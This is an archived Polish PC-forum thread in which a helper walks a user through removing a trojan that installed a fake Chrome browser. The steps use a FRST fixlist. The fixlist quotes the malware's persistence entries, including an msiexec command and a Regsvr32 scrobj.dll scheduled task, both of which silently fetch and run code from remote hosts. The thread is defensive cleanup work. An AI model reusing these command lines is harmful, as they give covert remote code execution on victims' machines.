Skocz do zawartości
Zamknięcie Forum PC LAB

Szanowny Użytkowniku,

Informujemy, że za 30 dni tj. 30 listopada 2024 r. serwis internetowy Forum PC LAB zostanie zamknięty.

Administrator Serwisu Forum PC LAB - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie: wypowiada całość usług Serwisu Forum PC LAB z zachowaniem miesięcznego okresu wypowiedzenia.

Administrator Serwisu Forum PC LAB informuje, że:

  1. Z dniem 29 listopada 2024 r. zakończy się świadczenie wszystkich usług Serwisu Forum PC LAB. Ważną przyczyną uzasadniającą wypowiedzenie jest zamknięcie Serwisu Forum PC LAB
  2. Dotychczas zamowione przez Użytkownika usługi Serwisu Forum PC LAB będą świadczone w okresie wypowiedzenia tj. do dnia 29 listopada 2024 r.
  3. Po ogłoszeniu zamknięcia Serwisu Forum od dnia 30 października 2024 r. zakładanie nowych kont w serwisie Forum PC LAB nie będzie możliwe
  4. Wraz z zamknięciem Serwisu Forum PC LAB, tj. dnia 29 listopada 2024 r. nie będzie już dostępny katalog treści Forum PC LAB. Do tego czasu Użytkownicy Forum PC LAB mają dostęp do swoich treści w zakładce "Profil", gdzie mają możliwość ich skopiowania lub archiwizowania w formie screenshotów.
  5. Administrator danych osobowych Użytkowników - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie zapewnia realizację praw podmiotów danych osobowych przez cały okres świadczenia usług Serwisu Forum PC LAB. Szczegółowe informacje znajdziesz w Polityce Prywatności

Administrator informuje, iż wraz z zamknięciem Serwisu Forum PC LAB, dane osobowe Użytkowników Serwisu Forum PC LAB zostaną trwale usunięte ze względu na brak podstawy ich dalszego przetwarzania. Proces trwałego usuwania danych z kopii zapasowych może przekroczyć termin zamknięcia Forum PC LAB o kilka miesięcy. Wyjątek może stanowić przetwarzanie danych użytkownika do czasu zakończenia toczących się postepowań.

Temat został przeniesiony do archiwum

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

Biauko91

Problem werfault i luckystarting

dodany przez Biauko91, w Internet, sieci i bezpieczeństwo

Rekomendowane odpowiedzi

Biauko91    2

Biauko91
Napisano

Witam. Otoz ostatnim czasem mam problem z wyskakujacym problemem, werfault.exe blad aplikacji, pisze tam cos o "pamiec nie moze byc written". Drugi problem powstal wczoraj(mam nadzieje, ze nie musze zakladac oddzielnego tematu?), z luckystarting. wyczytalem,ze jest to trojan bo przegladarka wyglada inaczej- w otartych zakladkach jest cos takiego (2) Youtube, podobno ten trojan jakby odpala swoja przegladarke a nie ta co mam. prosze o pomoc. dodaje logi z FRST

 

 

addition : http://wklej.org/id/3092403/

 

FRST : http://wklej.org/id/3092404/

 

Shortcut: http://wklej.org/id/3092407/

 

czekam na odpowiedz i dalsze instrukcje.

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach

filutka78    11

filutka78
Napisano

1)

Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)

Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)

Shortcut: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)

Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)

Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.)

Te skróty dam do usuwania, bo przekierowują do fałszywej przeglądarki C:\Program Files (x86)\Dohat\Application\chrome.exe, która wygląda jak Google Chrome, ale w rzeczywistości to Trojan.

Potem zrobisz sobie nowe skróty w tych samych lokalizacjach.

 

2) Otwórz Notatnik i wklej w nim:

FirewallRules: [{3FFA97EF-4CFA-478A-A10D-5D8D3385B327}] => (Allow) C:\Program Files (x86)\Dohat\Application\chrome.exe

FirewallRules: [{58E960AC-FA44-43F4-9E6B-4724FBDDC395}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe

FirewallRules: [{562F350D-7C88-436B-8FF2-518F28F2DA11}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe

MSCONFIG\Services: FirefoxU => 2

RemoveDirectory: C:\Program Files (x86)\Dohat

RemoveDirectory: C:\Program Files (x86)\Firefox

HKU\S-1-5-21-2286228726-4273474922-1041163010-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YNUIcOWI8FjNQNWM3MjhXOUJXMTNWOTRQNUI3MUZSRH== /q

C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk

C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

C:\Users\Public\Desktop\Google Chrome.lnk

Task: {C266D9A4-E606-440B-829B-BFC69438165C} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1YNUIcOWI8FjNQNWM3MjhXOUJXMTNWOTRQNUI3MUZSRH== scrobj.dll

HKU\S-1-5-21-2286228726-4273474922-1041163010-1000\...\ChromeHTML: -> C:\Program Files (x86)\Dohat\Application\chrome.exe (Google Inc.) <==== UWAGA

2017-04-13 14:18 - 2017-04-13 14:18 - 00000000 ____D C:\Users\Admin\AppData\Roaming\SSMgre

2017-04-19 15:01 - 2017-04-19 15:01 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Firefox

2017-04-19 15:01 - 2017-04-19 15:01 - 00000000 ____D C:\Users\Admin\AppData\Local\Firefox

2017-04-19 15:00 - 2017-04-21 17:39 - 00000000 _____ C:\Users\Public\Documents\temp.dat

2017-04-19 15:00 - 2017-04-21 17:34 - 00000000 _____ C:\Users\Public\Documents\report.dat

2017-04-19 15:00 - 2017-04-19 19:18 - 00000000 ____D C:\Users\Admin\AppData\Local\3DM

2017-04-19 15:00 - 2017-04-19 15:01 - 00000000 ____D C:\Program Files (x86)\Firefox

2017-04-19 15:00 - 2017-04-19 15:00 - 00000000 ____D C:\Users\Admin\AppData\Local\Dohat

2017-04-19 15:00 - 2017-04-19 15:00 - 00000000 ____D C:\Program Files (x86)\Dohat

2017-04-19 14:55 - 2017-04-21 17:34 - 00000000 ____D C:\Program Files (x86)\BiaoJi

FF ProfilePath: C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\vrabtv1z.default [2017-04-20]

FF Extension: (FF Adr) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\vrabtv1z.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-19] [brak podpisu cyfrowego]

FF Extension: (Polski Language Pack) - C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\vrabtv1z.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-04-19] [brak podpisu cyfrowego]

FF SearchPlugin: C:\Users\Admin\AppData\Roaming\Firefox\Firefox\Profiles\vrabtv1z.default\searchplugins\startsearch.xml [2017-04-19]

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk

HOSTS:

EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe

Uruchom FRST i kliknij przycisk Fix (NAPRAW).

 

----------------------

Jeśli będzie OK, to będziemy kończyć:

Otwórz Notatnik i wklej w nim:

DeleteQuarantine:

Plik zapisz pod nazwą fixlist.txt i umieść obok FRST. Uruchom FRST i kliknij w Fix (NAPRAW).

przez SHIFT+DEL usuń pozostały folder C:\FRST.

 

F.

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach

Biauko91    2

Biauko91
Napisano

Wybacz ale troche nie rozumiem co mam zronic... kazdy cytat czyli 1,2 i 3 mam zrobic w oddzielnych notatnikach i dodac do folderu z FRST?

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach

filutka78    11

filutka78
Napisano

tylko nr 2, ewentualnie także nr 3 (jeśli już wszystko będzie OK)

oczywiście oddzielnie

 

F.

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach

Biauko91    2

Biauko91
Napisano

jesli tak to zrobie wszystkie. czyli zrobic 3 notatniki i umiescic w folderze tak? czy kazdy osobno i napraw?

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach

filutka78    11

filutka78
Napisano

tylko nr 2 i ewentualnie nr 3

 

każde oddzielnie!

 

nr 1 to tylko mój komunikat dla Ciebie.

 

F.

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach

Biauko91    2

Biauko91
Napisano

A moglbym Ciebie jeszcze chwile ppomeczyc? Kupilem komputer 3-4 miesiace temu, windows 7. po miesiacu pojawil sie komunikat, ze minela waznosc windowsa i trzeba aktywowac. Powiedzialem o tym dla goscia, ktory mi go sprzedal i powiedzial, ze zrobi to jak trzeba, ze aktywuje.... 2 miesiace spokoju i teraz znowu ten sam komunikat, ze windows wygasa i trzeba aktywowaC? co z tym zrobic? z gory dzieki

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach

Biauko91    2

Biauko91
Napisano

ok. dziekuje Tobie za pomoc. jesli bedzie to samo to zglosze sie do Ciebie :) hej

Udostępnij tę odpowiedź

Odnośnik do odpowiedzi
Udostępnij na innych stronach
Przejdź do listy tematów

  • Ostatnio przeglądający   0 użytkowników

    Brak zarejestrowanych użytkowników przeglądających tę stronę.

  • Tematy

  • Odpowiedzi

    • PanPio
      AMD ZEN 5 (SERIA RYZEN 9xxx / SOCKET AM5) - wątek zbiorczy

      Przez PanPio · Napisano

      Ciekawy filozoficzny post, ja to odbieram inaczej - 9800X3D potrafi być 30% szybszy od 7800X3D i to przyrost w 18 miesięcy. Jeżeli upgrade dokonujesz w tej samych "widełkach" wydajnościowych zmieniajac starsze i5 na nowsze i5 to przyrost potrafi być przez 2 lata mniejszy niż nawet 5% za to energetycznie bywa że jest 30% lepiej, ostatecznie jest to jakaś ewolucja - pamiętaj że rozwój technologii jest iteratywny i polega na małych przyrostach które ostatecznie składają się na coś wielkiego ale ostatecznie masz rację - i7-2600 do dzisiaj może stanowić podstawę użytecznego komputera biurowego, skylake posłuszy pewnie i do 2030 w takich celach. Rasteryzacja w kartach graficznych faktycznie stoi nieco w miejscu, nVidia próbuje zrewolucjonizować rynek vendorlockowymi technikami jak swoje DLSSy, ostatecznie doprowadzi to do stagnacji gdzie bez zamydlonego ekranu nie pogramy w 4K, silniki graficzne też nie rozwijają się w oczekiwanym tempie - unity rozpadło się przez kiepski zarząd, unreal engine 5 to król mikroopóźnień, od zakończenia akceleracji sprzętowej dźwięku w windows vista (okolice 2007) nie było w audio żadnej rewolucji a wręcz ewolucji - id Tech to do dzisiaj jedyny engine który potrafi wyrysować łuk a nie koła z nakładanych trójkątów... Także sygnałów że branża kuleje nigdy nie brakowało - grunt to realizować swoje cele i jak tak jak ja od lat 2000 celujesz w średnią półkę cenową - szukać takich upgrade które faktycznie coś dają no i mieć świadomość że rtx 5090 to będzie 600w potwór z gddr7 i ceną na poziomie 12000 pln, takiej wydajności w kartach do 2000zł nie zobaczymy do 2030r. Pamiętam WOW jakie zrobił na mnie Teoria Chaosu splinter cella (mądrze zaprogramowana gra działająca również na konsolach) Far Cry 1 (był nieziemski na premierę) Crysis wyrywał z butów (8800gtx ledwo dawał radę), wszystko potem to sidegrade z momentami które pokazywały że 200 mln usd budżetu może dać jakościowy tytuł jak Red Dead 2, przez ostatnie 20 lat dobrych gier pctowych nie brakowało ale większość to ciągły sidegrade niepotrzebujący najmocniejszych sprzętów, dobieranie timingów pamięci to zawsze była nieco sztuka dla sztuki
    • TheMr.
      Off Polityczny

      Przez TheMr. · Napisano

      Na ITH podobna wolność słowa jak na X/Twitterze. No cóż, trzeba będzie po prostu listę ignorowanych wydłużyć  
    • EvilKillaruna
      Zamknięcie forum

      Przez EvilKillaruna · Napisano

      Tak, ale są związane z usługą udostępnienia platformy z ramienia podmiotu X. W tym wypadku RASP. Jeśli treść, nawet przerobioną na anonimową, przetwarzać zacząłby ktoś inny, nie wiem czy przypadkiem nie potrzeba uzyskać ponownie zgody na przetwarzanie wtórne/dziedziczne. Być może bezpośrednio z RASP, ale już stwierdzono, że nie ma takiej opcji. Głośno myślę jedynie, nie wczytywałem się tak głęboko w przepisy. Ok, ale co jeśli posty zawierają informacje mogące przyczynić się do ustalenia tożsamości piszącego/piszących? Tu już robi się niestety grubiej.    
    • PanPio
      Wycena zestawów komputerowych

      Przez PanPio · Napisano

      Ja odpowiem bo nie wybieram się na tamto forum. Zależy czy masz boxy, gwarancję i jak szybko chcesz sprzedać ale coś koło 2100.
    • M4KU
      Wycena zestawów komputerowych

      Przez M4KU · Napisano

      Polecam zapytać na Forum ITHardware.pl tutaj już raczej nikt ci nie odpowie, to forum się zamyka i wszyscy przeszli na ith.   @MuziPL .

  • Aktywni użytkownicy

×
×
  • Dodaj nową pozycję...